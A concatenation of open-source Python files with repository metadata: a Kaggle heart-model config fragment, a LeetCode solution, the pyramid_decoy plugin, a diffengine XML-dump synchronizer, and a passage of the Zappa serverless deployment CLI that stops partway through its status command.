l_pat_avg_ss_sigma_cm = nn.layers.SliceLayer(l_pat_avg_ss_musigma_cm, indices=1, axis=-1)
l_pat_avg_aggr_mu_sigma = layers.JeroenLayer([l_pat_avg_ss_mu_cm, l_pat_avg_ss_sigma_cm, lin_slice_mask, l_scaled_slice_locations], rescale_input=1.)
l_mean = layers.MuSigmaErfLayer(l_pat_avg_aggr_mu_sigma)
return {
"inputs":{
"sliced:data:sax": l0,
"sliced:data:sax:is_not_padded": lin_slice_mask,
"sliced:data:sax:locations": lin_slice_locations,
},
"outputs": {
"systole": l_systole,
"diastole": l_diastole,
"average": l_mean,
},
"regularizable": {
},
}
|
317070/kaggle-heart
|
configurations/je_os_segmentandintegrate_smartsigma_dropout.py
|
Python
|
mit
| 12,565
|
# -*- coding: utf-8 -*-
# Given an unsorted integer array, find the first missing positive integer.
#
# For example,
# Given [1,2,0] return 3,
# and [3,4,-1,1] return 2.
# [1,3,4,2,5,8,9,7]
# Your algorithm should run in O(n) time and uses constant space.
# 根据题目来看, find the first minimum missing positive integer, 所以一定是从1 开始的
# 本题的关键是合理利用下标, 即index值
# 第一次遍历, 将每个数与其下标对应, 1 对应 0, 2 对应 1...
# 第二次遍历, 查看哪个index于其值不符, 即是first missing integer.
class Solution():
def firstMissingPositive(self, A):
i = 0
while i < len(A):
# 变换和变换条件是关键
if A[i] > 0 and A[i] - 1 < len(A) and A[i] != A[A[i] - 1]:
A[A[i] - 1], A[i] = A[i], A[A[i] - 1]
else:
i += 1
for i, integer in enumerate(A):
if integer != i + 1:
return i + 1
return len(A) + 1
print Solution().firstMissingPositive([4,5,8,9,7])
|
ddu7/PyLC
|
041First Missing Positive.py
|
Python
|
mit
| 1,058
|
# Copyright (c) 2014 by pyramid_decoy authors and contributors
# <see AUTHORS file>
#
# This module is part of pyramid_decoy and is released under
# the MIT License (MIT): http://opensource.org/licenses/MIT
"""Main decoy module."""
__version__ = "0.2.0"
SETTINGS_PREFIX = "decoy"
def includeme(configurator):
"""
Configure decoy plugin on pyramid application.
:param pyramid.configurator.Configurator configurator: pyramid's
configurator object
"""
configurator.registry["decoy"] = get_decoy_settings(
configurator.get_settings()
)
configurator.add_route("decoy", pattern="/*p")
configurator.add_view("pyramid_decoy.views.decoy", route_name="decoy")
def get_decoy_settings(settings):
"""
Extract decoy settings out of all.
:param dict settings: pyramid app settings
:returns: decoy settings
:rtype: dict
"""
return {
k.split(".", 1)[-1]: v
for k, v in settings.items()
if k[: len(SETTINGS_PREFIX)] == SETTINGS_PREFIX
}
|
fizyk/pyramid_decoy
|
src/pyramid_decoy/__init__.py
|
Python
|
mit
| 1,031
|
"""
Assumptions:
* Revisions appear ordered by page ASC, timestamp ASC, rev_id ASC
* The max(rev_id) and max(timestamp) of revisions represents the last revision
chronologically captured by the dump
"""
import logging
import traceback
from mw.xml_dump import Iterator, map, open_file
from ..errors import RevisionOrderError
from ..types import ProcessorStatus, Revision, Timestamp, User
from .synchronizer import Synchronizer
logger = logging.getLogger("diffengine.synchronizers.xml_dump")
class XMLDump(Synchronizer):
def __init__(self, engine, store, paths, force_config=False, **map_kwargs):
super().__init__(engine, store, force_config=force_config)
self.paths = [str(path) for path in paths]
self.map_kwargs = map_kwargs
def run(self):
def _process_dump(dump, path):
try:
for page in dump:
logger.debug("Constructing new processor for {0}:{1}"\
.format(page.namespace, page.title))
processor_status = self.store.processor_status.get(page.id,
type=self.engine.Processor.Status)
if processor_status is None:
processor_status = self.engine.Processor.Status(page.id)
processor = self.engine.processor(processor_status)
for rev in page:
if rev.id <= processor_status.last_rev_id:
logger.debug(
"Skipping revision (already processed) " +\
"{0}:{1}".format(rev.id, rev.timestamp))
continue
try:
user = User(rev.contributor.id,
rev.contributor.user_text)
delta = processor.process(rev.id, rev.timestamp,
rev.text)
revision = Revision(rev.id, rev.timestamp, page.id,
user, delta)
yield (revision, None)
except RevisionOrderError as e:
logger.error(traceback.format_exc())
logger.info("Skipping revision (out of order) " + \
"{0}:{1}".format(rev.id, rev.timestamp))
logger.debug("Finished processing page {0}:{1}"\
.format(page.namespace, page.title))
yield (processor.status, page.title)
logger.debug("Finished processing dump at {0}".format(path))
yield (path, None)
except Exception as e:
logger.error(traceback.format_exc())
raise
engine_status = self.store.engine_status.get(type=self.engine.Status)
if engine_status is None:
logger.info("Starting {0} from scratch.".format(self.engine.info()))
engine_status = self.engine.Status(self.engine.info())
max_rev_id = 0
max_timestamp = Timestamp(0)
if len(self.paths) == 1:
dump = Iterator.from_file(open_file(self.paths[0]))
rev_proc_or_paths = _process_dump(dump, self.paths[0])
else:
rev_proc_or_paths = map(self.paths, _process_dump,
**self.map_kwargs)
try:
for rev_proc_or_path, meta in rev_proc_or_paths:
if isinstance(rev_proc_or_path, Revision):
revision = rev_proc_or_path
self.store.revisions.store(revision)
self.status.stats['revisions_processed'] += 1
max_rev_id = max(revision.rev_id, max_rev_id)
max_timestamp = max(revision.timestamp, max_timestamp)
elif isinstance(rev_proc_or_path, ProcessorStatus):
processor_status = rev_proc_or_path
page_title = meta
logger.debug("Completed processing page " + \
"{0}. {1}".format(
page_title,
processor_status.stats))
self.store.processor_status.store(processor_status)
elif isinstance(rev_proc_or_path, str):
path = rev_proc_or_path
logger.info("Completed processing dump {0}".format(path))
else:
raise RuntimeError(
"Did not expect a " + \
"{0}".format(type(rev_proc_or_path)))
self.status.update(max_rev_id, max_timestamp)
self.store.engine_status.store(engine_status)
except Exception as e:
logger.error(traceback.format_exc())
raise
|
halfak/Difference-Engine
|
diffengine/synchronizers/xml_dump.py
|
Python
|
mit
| 5,555
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Zappa CLI
Deploy arbitrary Python programs as serverless Zappa applications.
"""
from __future__ import unicode_literals
from __future__ import division
import argcomplete
import argparse
import base64
import pkgutil
import botocore
import click
import collections
import hjson as json
import inspect
import importlib
import logging
import os
import pkg_resources
import random
import re
import requests
import slugify
import string
import sys
import tempfile
import time
import toml
import yaml
import zipfile
from click.exceptions import ClickException
from dateutil import parser
from datetime import datetime,timedelta
from zappa import Zappa, logger, API_GATEWAY_REGIONS
from util import (check_new_version_available, detect_django_settings,
detect_flask_apps, parse_s3_url, human_size)
CUSTOM_SETTINGS = [
'assume_policy',
'attach_policy',
'aws_region',
'delete_local_zip',
'delete_s3_zip',
'exclude',
'http_methods',
'integration_response_codes',
'method_header_types',
'method_response_codes',
'parameter_depth',
'role_name',
'touch',
]
##
# Main Input Processing
##
class ZappaCLI(object):
"""
ZappaCLI object is responsible for loading the settings,
handling the input arguments and executing the calls to the core library.
"""
# CLI
vargs = None
command = None
command_env = None
# Zappa settings
zappa = None
zappa_settings = None
load_credentials = True
# Specific settings
api_stage = None
app_function = None
aws_region = None
debug = None
prebuild_script = None
project_name = None
profile_name = None
lambda_arn = None
lambda_name = None
lambda_description = None
s3_bucket_name = None
settings_file = None
zip_path = None
handler_path = None
vpc_config = None
memory_size = None
use_apigateway = None
lambda_handler = None
django_settings = None
manage_roles = True
exception_handler = None
environment_variables = None
authorizer = None
stage_name_env_pattern = re.compile('^[a-zA-Z0-9_]+$')
def __init__(self):
self._stage_config_overrides = {} # change using self.override_stage_config_setting(key, val)
@property
def stage_config(self):
"""
A shortcut property for settings of a stage.
"""
def get_stage_setting(stage, extended_stages=None):
if extended_stages is None:
extended_stages = []
if stage in extended_stages:
raise RuntimeError(stage + " has already been extended to these settings. "
"There is a circular extends within the settings file.")
extended_stages.append(stage)
try:
stage_settings = dict(self.zappa_settings[stage].copy())
except KeyError:
raise ClickException("Cannot extend settings for undefined environment '" + stage + "'.")
extends_stage = self.zappa_settings[stage].get('extends', None)
if not extends_stage:
return stage_settings
extended_settings = get_stage_setting(stage=extends_stage, extended_stages=extended_stages)
extended_settings.update(stage_settings)
return extended_settings
settings = get_stage_setting(stage=self.api_stage)
# Backwards compatible for delete_zip setting that was more explicitly named delete_local_zip
if u'delete_zip' in settings:
settings[u'delete_local_zip'] = settings.get(u'delete_zip')
settings.update(self.stage_config_overrides)
return settings
@property
def stage_config_overrides(self):
"""
Returns zappa_settings we forcefully override for the current stage
set by `self.override_stage_config_setting(key, value)`
"""
return getattr(self, '_stage_config_overrides', {}).get(self.api_stage, {})
def override_stage_config_setting(self, key, val):
"""
Forcefully override a setting set by zappa_settings (for the current stage only)
:param key: settings key
:param val: value
"""
self._stage_config_overrides = getattr(self, '_stage_config_overrides', {})
self._stage_config_overrides.setdefault(self.api_stage, {})[key] = val
def handle(self, argv=None):
"""
Main function.
Parses command, load settings and dispatches accordingly.
"""
desc = ('Zappa - Deploy Python applications to AWS Lambda'
' and API Gateway.\n')
parser = argparse.ArgumentParser(description=desc)
parser.add_argument(
'-v', '--version', action='version',
version=pkg_resources.get_distribution("zappa").version,
help='Print the zappa version'
)
parser.add_argument(
'-a', '--app_function', help='The WSGI application function.'
)
parser.add_argument(
'-s', '--settings_file', help='The path to a Zappa settings file.'
)
env_parser = argparse.ArgumentParser(add_help=False)
group = env_parser.add_mutually_exclusive_group()
all_help = ('Execute this command for all of our defined '
'Zappa environments.')
group.add_argument('--all', action='store_true', help=all_help)
group.add_argument('command_env', nargs='?')
##
# Certify
##
subparsers = parser.add_subparsers(title='subcommands', dest='command')
cert_parser = subparsers.add_parser(
'certify', parents=[env_parser],
help='Create and install SSL certificate'
)
cert_parser.add_argument(
'--no-cleanup', action='store_true',
help=("Don't remove certificate files from /tmp during certify."
" Dangerous.")
)
##
# Deploy
##
subparsers.add_parser(
'deploy', parents=[env_parser], help='Deploy application.'
)
subparsers.add_parser('init', help='Initialize Zappa app.')
##
# Package
##
package_parser = subparsers.add_parser(
'package', parents=[env_parser], help='Build the application zip package locally.'
)
##
# Invocation
##
invoke_parser = subparsers.add_parser(
'invoke', parents=[env_parser],
help='Invoke remote function.'
)
invoke_parser.add_argument(
'--raw', action='store_true',
help=('When invoking remotely, invoke this python as a string,'
' not as a modular path.')
)
invoke_parser.add_argument('command_rest')
##
# Manage
##
manage_parser = subparsers.add_parser(
'manage',
help='Invoke remote Django manage.py commands.'
)
rest_help = ("Command in the form of <env> <command>. <env> is not "
"required if --all is specified")
manage_parser.add_argument('--all', action='store_true', help=all_help)
manage_parser.add_argument('command_rest', nargs='+', help=rest_help)
##
# Rollback
##
def positive_int(s):
""" Ensure an arg is positive """
i = int(s)
if i < 0:
msg = "This argument must be positive (got {})".format(s)
raise argparse.ArgumentTypeError(msg)
return i
rollback_parser = subparsers.add_parser(
'rollback', parents=[env_parser],
help='Rollback deployed code to a previous version.'
)
rollback_parser.add_argument(
'-n', '--num-rollback', type=positive_int, default=0,
help='The number of versions to rollback.'
)
##
# Scheduling
##
subparsers.add_parser(
'schedule', parents=[env_parser],
help='Schedule functions to occur at regular intervals.'
)
##
# Status
##
status_parser = subparsers.add_parser(
'status', parents=[env_parser],
help='Show deployment status and event schedules.'
)
status_parser.add_argument(
'--json', action='store_true',
help='Returns status in JSON format.'
) # https://github.com/Miserlou/Zappa/issues/407
##
# Log Tailing
##
tail_parser = subparsers.add_parser(
'tail', parents=[env_parser], help='Tail deployment logs.'
)
tail_parser.add_argument(
'--no-color', action='store_true',
help="Don't color log tail output."
)
tail_parser.add_argument(
'--http', action='store_true',
help='Only show HTTP requests in tail output.'
)
tail_parser.add_argument(
'--non-http', action='store_true',
help='Only show non-HTTP requests in tail output.'
)
tail_parser.add_argument(
'--since', type=str, default="100000s",
help="Only show lines since a certain timeframe."
)
tail_parser.add_argument(
'--filter', type=str, default="",
help="Apply a filter pattern to the logs."
)
##
# Undeploy
##
undeploy_parser = subparsers.add_parser(
'undeploy', parents=[env_parser], help='Undeploy application.'
)
undeploy_parser.add_argument(
'--remove-logs', action='store_true',
help=('Removes log groups of api gateway and lambda task'
' during the undeployment.'),
)
undeploy_parser.add_argument(
'-y', '--yes', action='store_true', help='Auto confirm yes.'
)
##
# Unschedule
##
subparsers.add_parser('unschedule', parents=[env_parser],
help='Unschedule functions.')
##
# Updating
##
subparsers.add_parser(
'update', parents=[env_parser], help='Update deployed application.'
)
argcomplete.autocomplete(parser)
args = parser.parse_args(argv)
self.vargs = vars(args)
# Parse the input
# NOTE(rmoe): Special case for manage command
# The manage command can't have both command_env and command_rest
# arguments. Since they are both positional arguments argparse can't
# differentiate the two. This causes problems when used with --all.
# (e.g. "manage --all showmigrations admin" argparse thinks --all has
# been specified AND that command_env='showmigrations')
# By having command_rest collect everything but --all we can split it
# apart here instead of relying on argparse.
if args.command == 'manage' and not self.vargs.get('all'):
self.command_env = self.vargs['command_rest'].pop(0)
else:
self.command_env = self.vargs.get('command_env')
self.command = args.command
# We don't have any settings yet, so make those first!
# (Settings-based interactions will fail
# before a project has been initialized.)
if self.command == 'init':
self.init()
return
# Make sure there isn't a new version available
if not self.vargs.get('json'):
self.check_for_update()
# Load and Validate Settings File
self.load_settings_file(self.vargs.get('settings_file'))
# Should we execute this for all environments, or just one?
all_environments = self.vargs.get('all')
environments = []
if all_environments: # All envs!
environments = self.zappa_settings.keys()
else: # Just one env.
if not self.command_env:
# If there's only one environment defined in the settings,
# use that as the default.
if len(self.zappa_settings.keys()) == 1:
environments.append(self.zappa_settings.keys()[0])
else:
parser.error("Please supply an environment to interact with.")
else:
environments.append(self.command_env)
for environment in environments:
try:
self.dispatch_command(self.command, environment)
except ClickException as e:
# Discussion on exit codes: https://github.com/Miserlou/Zappa/issues/407
e.show()
sys.exit(e.exit_code)
def dispatch_command(self, command, environment):
"""
Given a command to execute and environment,
execute that command.
"""
self.api_stage = environment
if command not in ['status', 'manage']:
click.echo("Calling " + click.style(command, fg="green", bold=True) + " for environment " +
click.style(self.api_stage, bold=True) + ".." )
# Explicity define the app function.
if self.vargs['app_function'] is not None:
self.app_function = self.vargs['app_function']
# Load our settings, based on api_stage.
try:
self.load_settings(self.vargs['settings_file'])
except ValueError as e:
print("Error: {}".format(e.message))
sys.exit(-1)
self.callback('settings')
# Hand it off
if command == 'deploy': # pragma: no cover
self.deploy()
if command == 'package': # pragma: no cover
self.package()
elif command == 'update': # pragma: no cover
self.update()
elif command == 'rollback': # pragma: no cover
self.rollback(self.vargs['num_rollback'])
elif command == 'invoke': # pragma: no cover
if not self.vargs.get('command_rest'):
print("Please enter the function to invoke.")
return
self.invoke(self.vargs['command_rest'], raw_python=self.vargs['raw'])
elif command == 'manage': # pragma: no cover
if not self.vargs.get('command_rest'):
print("Please enter the management command to invoke.")
return
if not self.django_settings:
print("This command is for Django projects only!")
print("If this is a Django project, please define django_settings in your zappa_settings.")
return
command_tail = self.vargs.get('command_rest')
if len(command_tail) > 1:
command = " ".join(command_tail) # ex: zappa manage dev "shell --version"
else:
command = command_tail[0] # ex: zappa manage dev showmigrations admin
self.invoke(command, command="manage")
elif command == 'tail': # pragma: no cover
self.tail(
colorize=(not self.vargs['no_color']),
http=self.vargs['http'],
non_http=self.vargs['non_http'],
since=self.vargs['since'],
filter_pattern=self.vargs['filter'],
)
elif command == 'undeploy': # pragma: no cover
self.undeploy(
noconfirm=self.vargs['yes'],
remove_logs=self.vargs['remove_logs']
)
elif command == 'schedule': # pragma: no cover
self.schedule()
elif command == 'unschedule': # pragma: no cover
self.unschedule()
elif command == 'status': # pragma: no cover
self.status(return_json=self.vargs['json'])
elif command == 'certify': # pragma: no cover
self.certify(no_cleanup=self.vargs['no_cleanup'])
##
# The Commands
##
def package(self):
"""
Only build the package
"""
# force not to delete the local zip
self.override_stage_config_setting('delete_local_zip', False)
# Execute the prebuild script
if self.prebuild_script:
self.execute_prebuild_script()
# Create the Lambda Zip
self.create_package()
self.callback('zip')
size = human_size(os.path.getsize(self.zip_path))
click.echo(click.style("Package created", fg="green", bold=True) + ": " + click.style(self.zip_path, bold=True) + " (" + size + ")")
def deploy(self):
"""
Package your project, upload it to S3, register the Lambda function
and create the API Gateway routes.
"""
# Execute the prebuild script
if self.prebuild_script:
self.execute_prebuild_script()
# Make sure this isn't already deployed.
deployed_versions = self.zappa.get_lambda_function_versions(self.lambda_name)
if len(deployed_versions) > 0:
raise ClickException("This application is " + click.style("already deployed", fg="red") +
" - did you mean to call " + click.style("update", bold=True) + "?")
# Make sure the necessary IAM execution roles are available
if self.manage_roles:
try:
self.zappa.create_iam_roles()
except botocore.client.ClientError:
raise ClickException(
click.style("Failed", fg="red") + " to " + click.style("manage IAM roles", bold=True) + "!\n" +
"You may " + click.style("lack the necessary AWS permissions", bold=True) +
" to automatically manage a Zappa execution role.\n" +
"To fix this, see here: " +
click.style("https://github.com/Miserlou/Zappa#using-custom-aws-iam-roles-and-policies", bold=True)
+ '\n')
# Create the Lambda Zip
self.create_package()
self.callback('zip')
# Upload it to S3
success = self.zappa.upload_to_s3(
self.zip_path, self.s3_bucket_name)
if not success: # pragma: no cover
raise ClickException("Unable to upload to S3. Quitting.")
# If using a slim handler, upload it to S3 and tell lambda to use this slim handler zip
if self.stage_config.get('slim_handler', False):
# https://github.com/Miserlou/Zappa/issues/510
success = self.zappa.upload_to_s3(self.handler_path, self.s3_bucket_name)
if not success: # pragma: no cover
raise ClickException("Unable to upload handler to S3. Quitting.")
# Copy the project zip to the current project zip
current_project_name = '{0!s}_current_project.zip'.format(self.project_name)
success = self.zappa.copy_on_s3(src_file_name=self.zip_path, dst_file_name=current_project_name,
bucket_name=self.s3_bucket_name)
if not success: # pragma: no cover
raise ClickException("Unable to copy the zip to be the current project. Quitting.")
handler_file = self.handler_path
else:
handler_file = self.zip_path
# Fixes https://github.com/Miserlou/Zappa/issues/613
try:
self.lambda_arn = self.zappa.get_lambda_function(
function_name=self.lambda_name)
except botocore.client.ClientError:
# Register the Lambda function with that zip as the source
# You'll also need to define the path to your lambda_handler code.
self.lambda_arn = self.zappa.create_lambda_function(
bucket=self.s3_bucket_name,
s3_key=handler_file,
function_name=self.lambda_name,
handler=self.lambda_handler,
description=self.lambda_description,
vpc_config=self.vpc_config,
timeout=self.timeout_seconds,
memory_size=self.memory_size
)
# Schedule events for this deployment
self.schedule()
endpoint_url = ''
deployment_string = click.style("Deployment complete", fg="green", bold=True) + "!"
if self.use_apigateway:
# Create and configure the API Gateway
template = self.zappa.create_stack_template(self.lambda_arn,
self.lambda_name,
self.api_key_required,
self.integration_content_type_aliases,
self.iam_authorization,
self.authorizer,
self.cors)
self.zappa.update_stack(self.lambda_name, self.s3_bucket_name, wait=True)
# Deploy the API!
api_id = self.zappa.get_api_id(self.lambda_name)
endpoint_url = self.deploy_api_gateway(api_id)
deployment_string = deployment_string + ": {}".format(endpoint_url)
# Create/link API key
if self.api_key_required:
if self.api_key is None:
self.zappa.create_api_key(api_id=api_id, stage_name=self.api_stage)
else:
self.zappa.add_api_stage_to_api_key(api_key=self.api_key, api_id=api_id, stage_name=self.api_stage)
if self.stage_config.get('touch', True):
requests.get(endpoint_url)
# Finally, delete the local copy our zip package
if self.stage_config.get('delete_local_zip', True):
self.remove_local_zip()
# Remove the project zip from S3.
self.remove_uploaded_zip()
self.callback('post')
click.echo(deployment_string)
def update(self):
"""
Repackage and update the function code.
"""
# Execute the prebuild script
if self.prebuild_script:
self.execute_prebuild_script()
# Temporary version check
try:
updated_time = 1472581018
function_response = self.zappa.lambda_client.get_function(FunctionName=self.lambda_name)
conf = function_response['Configuration']
last_updated = parser.parse(conf['LastModified'])
last_updated_unix = time.mktime(last_updated.timetuple())
except Exception as e:
click.echo(click.style("Warning!", fg="red") + " Couldn't get function " + self.lambda_name +
" in " + self.zappa.aws_region + " - have you deployed yet?")
sys.exit(-1)
if last_updated_unix <= updated_time:
click.echo(click.style("Warning!", fg="red") +
" You may have upgraded Zappa since deploying this application. You will need to " +
click.style("redeploy", bold=True) + " for this deployment to work properly!")
# Make sure the necessary IAM execution roles are available
if self.manage_roles:
try:
self.zappa.create_iam_roles()
except botocore.client.ClientError:
click.echo(click.style("Failed", fg="red") + " to " + click.style("manage IAM roles", bold=True) + "!")
click.echo("You may " + click.style("lack the necessary AWS permissions", bold=True) +
" to automatically manage a Zappa execution role.")
click.echo("To fix this, see here: " +
click.style("https://github.com/Miserlou/Zappa#using-custom-aws-iam-roles-and-policies",
bold=True))
sys.exit(-1)
# Create the Lambda Zip,
self.create_package()
self.callback('zip')
# Upload it to S3
success = self.zappa.upload_to_s3(self.zip_path, self.s3_bucket_name)
if not success: # pragma: no cover
raise ClickException("Unable to upload project to S3. Quitting.")
# If using a slim handler, upload it to S3 and tell lambda to use this slim handler zip
if self.stage_config.get('slim_handler', False):
# https://github.com/Miserlou/Zappa/issues/510
success = self.zappa.upload_to_s3(self.handler_path, self.s3_bucket_name)
if not success: # pragma: no cover
raise ClickException("Unable to upload handler to S3. Quitting.")
# Copy the project zip to the current project zip
current_project_name = '{0!s}_current_project.zip'.format(self.project_name)
success = self.zappa.copy_on_s3(src_file_name=self.zip_path, dst_file_name=current_project_name,
bucket_name=self.s3_bucket_name)
if not success: # pragma: no cover
raise ClickException("Unable to copy the zip to be the current project. Quitting.")
handler_file = self.handler_path
else:
handler_file = self.zip_path
# Register the Lambda function with that zip as the source
# You'll also need to define the path to your lambda_handler code.
self.lambda_arn = self.zappa.update_lambda_function(
self.s3_bucket_name, handler_file, self.lambda_name)
# Remove the uploaded zip from S3, because it is now registered..
self.remove_uploaded_zip()
# Update the configuration, in case there are changes.
self.lambda_arn = self.zappa.update_lambda_configuration(lambda_arn=self.lambda_arn,
function_name=self.lambda_name,
handler=self.lambda_handler,
description=self.lambda_description,
vpc_config=self.vpc_config,
timeout=self.timeout_seconds,
memory_size=self.memory_size)
# Finally, delete the local copy our zip package
if self.stage_config.get('delete_local_zip', True):
self.remove_local_zip()
if self.use_apigateway:
self.zappa.create_stack_template(self.lambda_arn,
self.lambda_name,
self.api_key_required,
self.integration_content_type_aliases,
self.iam_authorization,
self.authorizer,
self.cors)
self.zappa.update_stack(self.lambda_name, self.s3_bucket_name, wait=True, update_only=True)
api_id = self.zappa.get_api_id(self.lambda_name)
endpoint_url = self.deploy_api_gateway(api_id)
if self.stage_config.get('domain', None):
endpoint_url = self.stage_config.get('domain')
else:
endpoint_url = None
self.schedule()
self.callback('post')
if endpoint_url and 'https://' not in endpoint_url:
endpoint_url = 'https://' + endpoint_url
deployed_string = "Your updated Zappa deployment is " + click.style("live", fg='green', bold=True) + "!"
if self.use_apigateway:
deployed_string = deployed_string + ": " + click.style("{}".format(endpoint_url), bold=True)
api_url = None
if endpoint_url and 'amazonaws.com' not in endpoint_url:
api_url = self.zappa.get_api_url(
self.lambda_name,
self.api_stage)
if endpoint_url != api_url:
deployed_string = deployed_string + " (" + api_url + ")"
if self.stage_config.get('touch', True):
if api_url:
requests.get(api_url)
elif endpoint_url:
requests.get(endpoint_url)
click.echo(deployed_string)
def rollback(self, revision):
"""
Rollsback the currently deploy lambda code to a previous revision.
"""
print("Rolling back..")
self.zappa.rollback_lambda_function_version(
self.lambda_name, versions_back=revision)
print("Done!")
def tail(self, since, filter_pattern, limit=10000, keep_open=True, colorize=True, http=False, non_http=False):
"""
Tail this function's logs.
if keep_open, do so repeatedly, printing any new logs
"""
try:
from util import string_to_timestamp
since_stamp = string_to_timestamp(since)
last_since = since_stamp
while True:
new_logs = self.zappa.fetch_logs(
self.lambda_name,
start_time=since_stamp,
limit=limit,
filter_pattern=filter_pattern,
)
new_logs = [ e for e in new_logs if e['timestamp'] > last_since ]
self.print_logs(new_logs, colorize, http, non_http)
if not keep_open:
break
if new_logs:
last_since = new_logs[-1]['timestamp']
time.sleep(1)
except KeyboardInterrupt: # pragma: no cover
# Die gracefully
try:
sys.exit(0)
except SystemExit:
os._exit(130)
def undeploy(self, noconfirm=False, remove_logs=False):
"""
Tear down an exiting deployment.
"""
if not noconfirm: # pragma: no cover
confirm = raw_input("Are you sure you want to undeploy? [y/n] ")
if confirm != 'y':
return
if self.use_apigateway:
if remove_logs:
self.zappa.remove_api_gateway_logs(self.lambda_name)
domain_name = self.stage_config.get('domain', None)
# Only remove the api key when not specified
if self.api_key_required and self.api_key is None:
api_id = self.zappa.get_api_id(self.lambda_name)
self.zappa.remove_api_key(api_id, self.api_stage)
gateway_id = self.zappa.undeploy_api_gateway(
self.lambda_name,
domain_name=domain_name
)
self.unschedule() # removes event triggers, including warm up event.
self.zappa.delete_lambda_function(self.lambda_name)
if remove_logs:
self.zappa.remove_lambda_function_logs(self.lambda_name)
click.echo(click.style("Done", fg="green", bold=True) + "!")
def schedule(self):
"""
Given a a list of functions and a schedule to execute them,
setup up regular execution.
"""
events = self.stage_config.get('events', [])
if events:
if not isinstance(events, list): # pragma: no cover
print("Events must be supplied as a list.")
return
for event in events:
self.collision_warning(event.get('function'))
if self.stage_config.get('keep_warm', True):
if not events:
events = []
keep_warm_rate = self.stage_config.get('keep_warm_expression', "rate(4 minutes)")
events.append({'name': 'zappa-keep-warm',
'function': 'handler.keep_warm_callback',
'expression': keep_warm_rate,
'description': 'Zappa Keep Warm - {}'.format(self.lambda_name)})
if self.stage_config.get('lets_encrypt_expression'):
function_response = self.zappa.lambda_client.get_function(FunctionName=self.lambda_name)
conf = function_response['Configuration']
timeout = conf['Timeout']
if timeout < 60:
click.echo(click.style("Unable to schedule certificate autorenewer!", fg="red", bold=True) +
" Please redeploy with a " + click.style("timeout_seconds", bold=True) + " greater than 60!")
else:
events.append({'name': 'zappa-le-certify',
'function': 'handler.certify_callback',
'expression': self.stage_config.get('lets_encrypt_expression'),
'description': 'Zappa LE Certificate Renewer - {}'.format(self.lambda_name)})
if events:
try:
function_response = self.zappa.lambda_client.get_function(FunctionName=self.lambda_name)
except botocore.exceptions.ClientError as e: # pragma: no cover
click.echo(click.style("Function does not exist", fg="yellow") + ", please " +
click.style("deploy", bold=True) + "first. Ex:" +
click.style("zappa deploy {}.".format(self.api_stage), bold=True))
sys.exit(-1)
print("Scheduling..")
self.zappa.schedule_events(
lambda_arn=function_response['Configuration']['FunctionArn'],
lambda_name=self.lambda_name,
events=events
)
def unschedule(self):
"""
Given a a list of scheduled functions,
tear down their regular execution.
"""
# Run even if events are not defined to remove previously existing ones (thus default to []).
events = self.stage_config.get('events', [])
if not isinstance(events, list): # pragma: no cover
print("Events must be supplied as a list.")
return
function_arn = None
try:
function_response = self.zappa.lambda_client.get_function(FunctionName=self.lambda_name)
function_arn = function_response['Configuration']['FunctionArn']
except botocore.exceptions.ClientError as e: # pragma: no cover
raise ClickException("Function does not exist, you should deploy first. Ex: zappa deploy {}. "
"Proceeding to unschedule CloudWatch based events.".format(self.api_stage))
print("Unscheduling..")
self.zappa.unschedule_events(
lambda_name=self.lambda_name,
lambda_arn=function_arn,
events=events,
)
def invoke(self, function_name, raw_python=False, command=None):
"""
Invoke a remote function.
"""
# There are three likely scenarios for 'command' here:
# command, which is a modular function path
# raw_command, which is a string of python to execute directly
# manage, which is a Django-specific management command invocation
key = command if command is not None else 'command'
if raw_python:
command = {'raw_command': function_name}
else:
command = {key: function_name}
# Can't use hjson
import json as json
response = self.zappa.invoke_lambda_function(
self.lambda_name,
json.dumps(command),
invocation_type='RequestResponse',
)
if 'LogResult' in response:
print(base64.b64decode(response['LogResult']))
else:
print(response)
def status(self, return_json=False):
"""
Describe the status of the current deployment.
"""
def tabular_print(title, value):
"""
Convience function for priting formatted table items.
"""
click.echo('%-*s%s' % (32, click.style("\t" + title, fg='green') + ':', str(value)))
return
# Lambda Env Details
lambda_versions = self.zappa.get_lambda_function_versions(self.lambda_name)
if not lambda_versions:
raise ClickException(click.style("No Lambda %s detected in %s - have you deployed yet?" %
(self.lambda_name, self.zappa.aws_region), fg='red'))
status_dict = collections.OrderedDict()
status_dict["Lambda Versions"] = len(lambda_versions)
function_response = self.zappa.lambda_client.get_function(FunctionName=self.lambda_name)
conf = function_response['Configuration']
self.lambda_arn = conf['FunctionArn']
status_dict["Lambda Name"] = self.lambda_name
status_dict["Lambda ARN"] = self.lambda_arn
status_dict["Lambda Role ARN"] = conf['Role']
status_dict["Lambda Handler"] = conf['Handler']
status_dict["Lambda Code Size"] = conf['CodeSize']
status_dict["Lambda Version"] = conf['Version']
status_dict["Lambda Last Modified"] = conf['LastModified']
status_dict["Lambda Memory Size"] = conf['MemorySize']
status_dict["Lambda Timeout"] = conf['Timeout']
status_dict["Lambda Runtime"] = conf['Runtime']
if 'VpcConfig' in conf.keys():
status_dict["Lambda VPC ID"] = conf.get('VpcConfig', {}).get('VpcId', 'Not assigned')
else:
status_dict["Lambda VPC ID"] = None
# Calculated statistics
try:
function_invocations = self.zappa.cloudwatch.get_metric_statistics(
Namespace='AWS/Lambda',
MetricName='Invocations',
StartTime=datetime.utcnow()-timedelta(days=1),
EndTime=datetime.utcnow(),
Period=1440,
Statistics=['Sum'],
Dimensions=[{'Name': 'FunctionName',
'Value': '{}'.format(self.lambda_name)}]
)['Datapoints'][0]['Sum']
except Exception as e:
function_invocations = 0
try:
function_errors = self.zappa.cloudwatch.get_metric_statistics(
Namespace='AWS/Lambda',
MetricName='Errors',
StartTime=datetime.utcnow()-timedelta(days=1),
EndTime=datetime.utcnow(),
Period=1440,
Statistics=['Sum'],
Dimensions=[{'Name': 'FunctionName',
'Value': '{}'.format(self.lambda_name)}]
)['Datapoints'][0]['Sum']
except Exception as e:
function_errors = 0
try:
error_rate = "{0:.2f}%".format(function_errors / function_invocations * 100)
except:
error_rate = "Error calculating"
status_dict["Invocations (24h)"] = int(function_invocations)
status_dict["Errors (24h)"] = int(function_errors)
status_dict["Error Rate (24h)"] = error_rate
# URLs
if self.use_apigateway:
api_url = self.zappa.get_api_url(
self.lambda_name,
self.api_stage)
status_dict["API Gateway URL"] = api_url
# Api Keys
api_id = self.zappa.get_api_id(self.lambda_name)
for api_key in self.zappa.get_api_keys(api_id, self.api_stage):
status_dict["API Gateway x-api-key"] = api_key
# There literally isn't a better way to do this.
